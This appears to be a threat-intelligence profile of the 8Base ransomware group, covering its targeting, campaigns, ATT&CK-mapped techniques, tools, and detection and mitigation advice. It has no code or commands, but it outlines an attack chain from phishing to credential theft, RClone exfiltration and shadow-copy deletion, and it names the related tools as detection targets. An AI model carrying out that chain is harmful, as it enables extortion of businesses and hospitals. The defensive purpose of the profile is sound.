8Base

Background

8Base is a ransomware and data extortion group that emerged publicly in 2022 but significantly escalated operations in mid-2023, briefly becoming one of the most active ransomware operations by victim count. The group targets small and medium-sized businesses (SMBs) across a wide range of sectors, with a particular concentration in manufacturing, professional services, and finance.

The group primarily deploys a customized variant of Phobos ransomware, a widely available ransomware-as-a-service platform, alongside SmokeLoader for initial access. This reliance on commodity malware suggests 8Base may operate as a sophisticated affiliate group rather than a developer. Despite using off-the-shelf tools, the group's operational tempo is notable: in June 2023, 8Base listed more victims on their data leak site than any other ransomware group, including established operations like LockBit and Cl0p.

The group's name and branding draw no clear ideological meaning, and the actors behind 8Base remain unattributed. Victimology is broad geographically, with the United States, Brazil, United Kingdom, Germany, and France representing the most frequently targeted countries. The group publishes stolen data on a Tor- hosted leak site and threatens victims with public exposure if ransom demands are not met.

Notable Campaigns

SMB Surge (June-July 2023): During a two-month period, 8Base claimed responsibility for breaches at more than 35 organizations, making it the most active ransomware group by claimed victim count for that period. Most victims were small to mid-sized businesses with fewer than 500 employees, consistent with the group's targeting of organizations with limited security capabilities.

Professional Services Targeting: Throughout 2023-2024, 8Base consistently targeted accounting firms, law offices, and consulting companies, likely attracted by the sensitive client data held by these organizations and the reputational pressure to quietly resolve ransomware incidents rather than disclose them publicly.

Latin American Campaign (2023-2024): 8Base showed unusually high activity against Brazilian and other Latin American organizations relative to other ransomware groups, suggesting possible linguistic or regional familiarity among the threat actors. Brazil ranked second only to the United States in 8Base victim counts during this period.

Healthcare Sector Attacks (2024): Despite emerging rhetoric from some ransomware groups about avoiding healthcare targets, 8Base continued attacking hospitals and medical providers, exfiltrating patient data and disrupting clinical operations to maximize extortion pressure.

Tactics, Techniques & Procedures

8Base gains initial access primarily through phishing campaigns (T1566.001) delivering SmokeLoader, which then retrieves additional payloads. The group also exploits exposed RDP services and unpatched internet-facing applications (T1190), consistent with broad SMB targeting where administrative interfaces are often left internet-accessible with default or weak credentials.

After establishing a foothold, 8Base operators use legitimate remote access tools including AnyDesk for persistent access and command execution. The group conducts network reconnaissance, harvests credentials with Mimikatz, and moves laterally via RDP (T1021.001). Data is staged and exfiltrated using RClone to cloud storage services before ransomware deployment.

The Phobos variant used by 8Base encrypts files and appends a custom extension. The group specifically targets and deletes shadow copies and backup catalogs (T1485) to prevent recovery without paying the ransom. Ransom notes direct victims to a Tor-based negotiation portal with a 72-hour initial deadline.

Tools & Malware

• Phobos Ransomware: Commodity ransomware-as-a-service platform, customized with 8Base branding. Encrypts local and network files with AES-256.
• SmokeLoader: Modular malware loader used for initial access and subsequent payload delivery; often distributed via phishing email attachments.
• SystemBC: SOCKS5 proxy used as a C2 relay to anonymize communications.
• Cobalt Strike: Commercial post-exploitation framework used for lateral movement and payload staging.
• Mimikatz: Credential harvesting tool for extracting passwords and hashes from Windows memory.
• AnyDesk: Legitimate remote desktop software abused for persistent interactive access to compromised systems.
• RClone: Open-source cloud synchronization tool used to exfiltrate data to remote cloud storage prior to encryption.

Indicators & Detection

8Base relies heavily on SmokeLoader for initial delivery, so email security controls blocking malicious Office document attachments and LNK files are primary preventive measures. Endpoint detection should flag SmokeLoader's characteristic process injection patterns and its use of legitimate Windows processes for code execution.

Monitor for AnyDesk installation or execution on servers and workstations where remote access software is not standard. AnyDesk is often deployed via batch scripts or pushed through Group Policy by 8Base operators to establish persistent access. Alert on RClone execution on any system, as it has virtually no legitimate use in enterprise environments and is strongly associated with data exfiltration.

Pre-encryption indicators include VSS deletion commands, rapid access to files across multiple directories, and connection establishment to Tor infrastructure or known Phobos C2 endpoints. Implement network segmentation to limit lateral RDP movement and enforce MFA on all remote access services to raise the cost of the group's credential-based access methods.